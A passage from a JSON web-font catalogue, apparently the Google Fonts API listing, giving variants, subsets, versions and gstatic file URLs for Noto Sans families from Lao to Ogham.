\"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt48cbdf5MK3riB2w.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4L8bdf5MK3riB2w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4ccbdf5MK3riB2w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4Q8bdf5MK3riB2w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4r8Hdf5MK3riB2w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4lsHdf5MK3riB2w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt48cHdf5MK3riB2w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt42MHdf5MK3riB2w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Lao Looped\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"lao\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomPr2M-Zw5V_T71k.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomHr3M-Zw5V_T71k.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomKT3M-Zw5V_T71k.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomPr3M-Zw5V_T71k.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomMj3M-Zw5V_T71k.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomCTwM-Zw5V_T71k.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomB3wM-Zw5V_T71k.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomHrwM-Zw5V_T71k.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanslaolooped/v2/a8IgNpbwKmHXpgXbMIsbSMP7-3U72qUOX5gBg6LRXExhqHIX9YPTpvqkW4UthhjomFPwM-Zw5V_T71k.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Lepcha\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"lepcha\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslepcha/v16/0QI7MWlB_JWgA166SKhu05TekNS32AJstqBXgd4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Limbu\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"limbu\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslimbu/v22/3JnlSDv90Gmq2mrzckOBBRRoNJVj0MF3OHRDnA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Linear A\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"linear-a\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslineara/v16/oPWS_l16kP4jCuhpgEGmwJOiA18FZj22zmHQAGQicw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Linear B\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"linear-b\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslinearb/v15/HhyJU4wt9vSgfHoORYOiXOckKNB737IV3BkFTq4EPw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Lisu\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"lisu\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHP2Vwt29IlxkVdig.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHP61wt29IlxkVdig.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHPB1st29IlxkVdig.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanslisu/v21/uk-3EGO3o6EruUbnwovcYhz6kh57_nqbcTdjJnHPPlst29IlxkVdig.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Lycian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"lycian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslycian/v15/QldVNSNMqAsHtsJ7UmqxBQA9r8wA5_naCJwn00E.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Lydian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"lydian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanslydian/v15/c4m71mVzGN7s8FmIukZJ1v4ZlcPReUPXMoIjEQI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mahajani\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"mahajani\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmahajani/v15/-F6sfiVqLzI2JPCgQBnw60Agp0JrvD5Fh8ARHNh4zg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Malayalam\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"malayalam\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_RuH9BFzEr6HxEA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_xuD9BFzEr6HxEA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_GOD9BFzEr6HxEA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_RuD9BFzEr6HxEA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_dOD9BFzEr6HxEA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_mOf9BFzEr6HxEA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_oef9BFzEr6HxEA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_xuf9BFzEr6HxEA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansmalayalam/v21/sJoi3K5XjsSdcnzn071rL37lpAOsUThnDZIfPdbeSNzVakglNM-Qw8EaeB8Nss-_7-f9BFzEr6HxEA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mandaic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"mandaic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmandaic/v15/cIfnMbdWt1w_HgCcilqhKQBo_OsMI5_A_gMk0izH.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Manichaean\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"manichaean\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmanichaean/v15/taiVGntiC4--qtsfi4Jp9-_GkPZZCcrfekqCNTtFCtdX.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Marchen\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"marchen\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-02\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmarchen/v17/aFTO7OZ_Y282EP-WyG6QTOX_C8WZMHhPk652ZaHk.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Masaram Gondi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"masaram-gondi\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmasaramgondi/v17/6xK_dThFKcWIu4bpRBjRYRV7KZCbUq6n_1kPnuGe7RI9WSWX.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Math\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"math\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmath/v15/7Aump_cpkSecTWaHRlH2hyV5UHkG-V048PW0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mayan Numerals\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"mayan-numerals\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmayannumerals/v15/PlIuFk25O6RzLfvNNVSivR09_KqYMwvvDKYjfIiE68oo6eepYQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Medefaidrin\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"medefaidrin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmedefaidrin/v21/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmErWlT318e5A3rw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansmedefaidrin/v21/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmHjWlT318e5A3rw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansmedefaidrin/v21/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmJTRlT318e5A3rw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansmedefaidrin/v21/WwkzxOq6Dk-wranENynkfeVsNbRZtbOIdLb1exeM4ZeuabBfmK3RlT318e5A3rw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Meetei Mayek\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"meetei-mayek\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1TJ__TW5PgeFYVa.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1RJ_vTW5PgeFYVa.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1SX_vTW5PgeFYVa.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1TJ_vTW5PgeFYVa.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1T7_vTW5PgeFYVa.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1QX-fTW5PgeFYVa.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1Qu-fTW5PgeFYVa.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1RJ-fTW5PgeFYVa.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansmeeteimayek/v14/HTxAL3QyKieByqY9eZPFweO0be7M21uSphSdhqILnmrRfJ8t_1Rg-fTW5PgeFYVa.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mende Kikakui\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"mende-kikakui\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmendekikakui/v28/11hRGoLHz17aKjQCWj-JHcLvu2Q5zZrnkbNCLUx_aDJLAHer.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Meroitic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"meroitic\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmeroitic/v16/IFS5HfRJndhE3P4b5jnZ3ITPvC6i00UDgDhTiKY9KQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Miao\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"miao\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmiao/v17/Dxxz8jmXMW75w3OmoDXVV4zyZUjgUYVslLhx.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Modi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"modi\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmodi/v20/pe03MIySN5pO62Z5YkFyT7jeav5qWVAgVol-.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mongolian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"mongolian\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmongolian/v17/VdGCAYADGIwE0EopZx8xQfHlgEAMsrToxLsg6-av1x0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mono\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_FNI49rXVEQQL8Y.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_NNJ49rXVEQQL8Y.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_A1J49rXVEQQL8Y.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_FNJ49rXVEQQL8Y.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_GFJ49rXVEQQL8Y.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_I1O49rXVEQQL8Y.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_LRO49rXVEQQL8Y.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_NNO49rXVEQQL8Y.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansmono/v21/BngrUXNETWXI6LwhGYvaxZikqZqK6fBq6kPvUce2oAZcdthSBUsYck4-_PpO49rXVEQQL8Y.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Mro\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"mro\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmro/v18/qWcsB6--pZv9TqnUQMhe9b39WDzRtjkho4M.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Multani\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"multani\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmultani/v20/9Bty3ClF38_RfOpe1gCaZ8p30BOFO1A0pfCs5Kos.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Myanmar\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"myanmar\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZs_y1ZtY3ymOryg38hOCSdOnFq0HGS1uEapkAC3AY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HE-98EwiEwLxR-r.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFa9MEwiEwLxR-r.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZq_y1ZtY3ymOryg38hOCSdOnFq0En23OU4o1AC.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HEC9cEwiEwLxR-r.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HEu8sEwiEwLxR-r.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFK88EwiEwLxR-r.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFW8MEwiEwLxR-r.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansmyanmar/v20/AlZv_y1ZtY3ymOryg38hOCSdOnFq0HFy8cEwiEwLxR-r.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans NKo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"nko\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2023-01-25\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansnko/v2/esDX31ZdNv-KYGGJpKGk2_RpMpCMHMLBrdA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Nabataean\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"nabataean\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansnabataean/v15/IFS4HfVJndhE3P4b5jnZ34DfsjO330dNoBJ9hK8kMK4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans New Tai Lue\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"new-tai-lue\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansnewtailue/v17/H4cKBW-Pl9DZ0Xe_nHUapt7PovLXAhAnY7wqaLy-OJgU3p_pdeXAYUbghFPKzeY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansnewtailue/v17/H4cKBW-Pl9DZ0Xe_nHUapt7PovLXAhAnY7wqaLy-OJgU3p_pddfAYUbghFPKzeY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansnewtailue/v17/H4cKBW-Pl9DZ0Xe_nHUapt7PovLXAhAnY7wqaLy-OJgU3p_pdTvHYUbghFPKzeY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansnewtailue/v17/H4cKBW-Pl9DZ0Xe_nHUapt7PovLXAhAnY7wqaLy-OJgU3p_pdQLHYUbghFPKzeY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Newa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"newa\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansnewa/v16/7r3fqXp6utEsO9pI4f8ok8sWg8n_qN4R5lNU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Nushu\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"nushu\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansnushu/v18/rnCw-xRQ3B7652emAbAe_Ai1IYaFWFAMArZKqQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Ogham\",\n      \"variants\": 